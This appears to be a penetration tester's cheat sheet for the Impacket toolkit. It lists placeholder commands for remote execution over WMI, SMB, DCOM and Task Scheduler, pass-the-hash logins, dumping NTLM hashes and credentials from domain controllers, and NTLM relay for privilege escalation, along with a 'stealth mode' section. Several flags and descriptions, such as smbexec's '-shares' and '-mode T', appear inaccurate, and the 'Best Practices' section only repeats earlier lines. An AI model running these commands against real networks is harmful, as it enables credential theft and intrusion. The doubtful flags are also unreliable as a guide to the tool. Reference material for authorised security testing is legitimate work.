Impacket

impacket logo
Impacket is a collection of Python scripts and libraries used for penetration testing and security assessments. It provides tools for working with network protocols, exploiting vulnerabilities, and performing post-exploitation tasks. Penetration testers utilize Impacket for tasks ranging from network reconnaissance and credential extraction to remote code execution and lateral movement within networks.

Installation and Setup

Install on Kali Linux

sudo apt update && sudo apt install impacket-scripts

Install on Debian/Ubuntu

sudo apt update && sudo apt install python3-impacket

Install via pipx (Recommended)

python3 -m pipx install impacket

Install from Source

git clone https://github.com/fortra/impacket.git
cd impacket
pip install .

Tools Overview

Impacket provides tools for interacting with Windows networking, SMB, Kerberos, Active Directory, and other protocols. I have listed and created a cheat sheet for the most common ones I use in penetration testing.

wmiexec.py – Remote Command Execution via WMI

wmiexec.py DOMAIN/USER:PASSWORD@TARGET                               #Execute command remotely via WMI
wmiexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                     #Use NTLM Hash for Authentication
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Suppress command output
wmiexec.py -A DOMAIN/USER@TARGET                                     #Prompt for Password Instead of Providing in Command

psexec.py – Remote Execution Over SMB

psexec.py DOMAIN/USER:PASSWORD@TARGET                                #Execute commands via SMB Named Pipes
psexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                      #Use NTLM Hash for Authentication
psexec.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET            #Specify Target IP
psexec.py -service-name CustomSvc DOMAIN/USER:PASSWORD@TARGET        #Customize Service Name

smbexec.py – Execute Commands via SMB

smbexec.py DOMAIN/USER:PASSWORD@TARGET                               #Execute commands interactively over SMB
smbexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                     #Pass-the-Hash Execution
smbexec.py -shares DOMAIN/USER:PASSWORD@TARGET                       #List SMB Shares
smbexec.py -mode T DOMAIN/USER:PASSWORD@TARGET                       #Run Commands via Task Scheduler Instead of Service

dcomexec.py – Remote Execution via DCOM

dcomexec.py DOMAIN/USER:PASSWORD@TARGET                              #Execute commands over DCOM
dcomexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Pass-the-Hash Execution
dcomexec.py -object MMC20 DOMAIN/USER:PASSWORD@TARGET                #Use MMC20 DCOM Object

atexec.py – Task Scheduler Execution

atexec.py DOMAIN/USER:PASSWORD@TARGET                                #Execute Commands via Task Scheduler
atexec.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                      #Use NTLM Hash for Authentication
atexec.py -debug DOMAIN/USER:PASSWORD@TARGET                         #Enable Debug Mode

secretsdump.py – Extract Credentials and Hashes

secretsdump.py DOMAIN/USER:PASSWORD@TARGET                           #Dump NTLM Hashes & Credentials
secretsdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                 #Use Pass-the-Hash
secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@TARGET             #Dump Only NTLM Hashes from DC
secretsdump.py -outputfile hashes.txt DOMAIN/USER:PASSWORD@TARGET    #Save Hashes to File

rpcdump.py – Dump RPC Endpoints

rpcdump.py DOMAIN/USER:PASSWORD@TARGET                               #List Exposed RPC Endpoints
rpcdump.py -target-ip 10.1.1.1 DOMAIN/USER:PASSWORD@TARGET           #Specify Target IP

samrdump.py – Enumerate SAM Accounts

samrdump.py DOMAIN/USER:PASSWORD@TARGET                              #Enumerate SAM User Accounts
samrdump.py -hashes :NTLM_HASH DOMAIN/USER@TARGET                    #Use NTLM Hash for Authentication

ntlmrelayx.py – NTLM Relay Attacks

ntlmrelayx.py -t TARGET                                              #Relay NTLM Authentication to Target
ntlmrelayx.py -smb2support -t TARGET                                 #Enable SMBv2 Support
ntlmrelayx.py -t ldap://DC_IP --delegate-access                      #Relay to LDAP for Privilege Escalation
ntlmrelayx.py -remove-mic -t TARGET                                  #Remove MIC to Exploit NTLMv1

Performance Tuning and Stealth Mode

wmiexec.py -silent DOMAIN/USER:PASSWORD@TARGET                       #Silent Execution
secretsdump.py -no-pass DOMAIN/USER@TARGET                           #Extract Hashes Without Password
ntlmrelayx.py -no-wcf -debug -t TARGET                               #Disable WCF and Enable Debugging
psexec.py -no-output DOMAIN/USER:PASSWORD@TARGET                     #Suppress Command Output

Best Practices

secretsdump.py -just-dc-ntlm DOMAIN/USER:PASSWORD@TARGET             #Extract Only NTLM Hashes
ntlmrelayx.py -t ldap://DC_IP --delegate-access                      #Relay NTLM to LDAP for Privilege Escalation
wmiexec.py -nooutput DOMAIN/USER:PASSWORD@TARGET                     #Suppress Command Output
smbexec.py -mode T DOMAIN/USER:PASSWORD@TARGET                       #Use Task Scheduler Mode for Execution